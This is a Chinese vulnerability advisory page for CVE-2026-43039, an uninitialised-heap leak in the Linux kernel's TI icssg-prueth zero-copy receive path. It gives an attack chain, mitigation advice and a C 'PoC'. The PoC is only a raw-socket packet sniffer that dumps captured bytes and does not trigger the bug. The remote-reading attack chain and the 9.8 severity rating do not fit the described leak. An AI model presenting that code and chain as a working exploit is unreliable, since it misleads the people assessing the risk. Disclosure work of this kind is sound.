IPBUF安全漏洞报告
English
CVE-2026-43039 CVSS 9.8 严重

CVE-2026-43039 Linux Kernel icssg-prueth信息泄露漏洞

披露日期: 2026-05-01
来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号
CVE-2026-43039
漏洞类型
信息泄露
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Linux Kernel

相关标签

Linux Kernel信息泄露内存破坏TI icssg-prueth驱动漏洞

漏洞概述

Linux内核TI icssg-prueth驱动存在严重漏洞。在ZC RX分发中,emac_dispatch_skb_zc()函数未将XDP数据拷贝至新skb,导致向用户空间传递未初始化内核堆内存,引发信息泄露。同时,错误的回收调用会破坏page_pool状态,影响系统稳定性。

技术细节

此漏洞源于Linux内核TI icssg-prueth驱动的emac_dispatch_skb_zc()函数实现缺陷。该函数在处理零拷贝接收路径时,虽通过napi_alloc_skb()分配了新skb,却未调用skb_copy_to_linear_data()将XDP缓冲区的有效数据拷贝至skb。因此,上传至协议栈的数据包实际包含未初始化的内核堆内存,导致敏感信息泄露。此外,针对非page_pool管理的skb错误调用skb_mark_for_recycle(),致使页面回收逻辑混乱,破坏page_pool状态,可能引发内核崩溃。

攻击链分析

STEP 1
步骤1
攻击者向运行受影响Linux内核版本的目标设备发送特制网络数据包。
STEP 2
步骤2
目标设备的TI icssg-prueth驱动接收数据包并触发零拷贝(ZC)RX分发路径。
STEP 3
步骤3
驱动程序中的emac_dispatch_skb_zc()函数分配skb但未复制数据,导致将未初始化的内核堆内存通过skb传递给上层协议栈。
STEP 4
步骤4
数据包被传递至用户空间,攻击者读取数据包内容,获取泄露的内核敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_packet.h> #include <net/ethernet.h> #include <arpa/inet.h> int main() { int sockfd; struct sockaddr_ll s_addr; unsigned char buffer[4096]; socklen_t addr_len = sizeof(s_addr); // Create raw socket to capture packets sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (sockfd < 0) { perror("Socket creation failed"); return 1; } printf("Listening for packets to detect kernel memory leak...\n"); while (1) { int len = recvfrom(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&s_addr, &addr_len); if (len < 0) { perror("Recvfrom failed"); break; } // In a real exploit scenario, specific traffic triggers the ZC path. // Dumping buffer to check for non-zero/uninitialized kernel data. printf("Received %d bytes. Dump: ", len); for (int i = 0; i < 32 && i < len; i++) { printf("%02x ", buffer[i]); } printf("\n"); } close(sockfd); return 0; }

影响范围

Linux Kernel (Commit before 5597dd284ff8c556c0b00f6a34473677426e3f81)

防御指南

临时缓解措施
限制对受影响网络接口的访问权限,或禁用相关的TI icssg-prueth驱动模块作为临时方案,直到内核升级完成。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表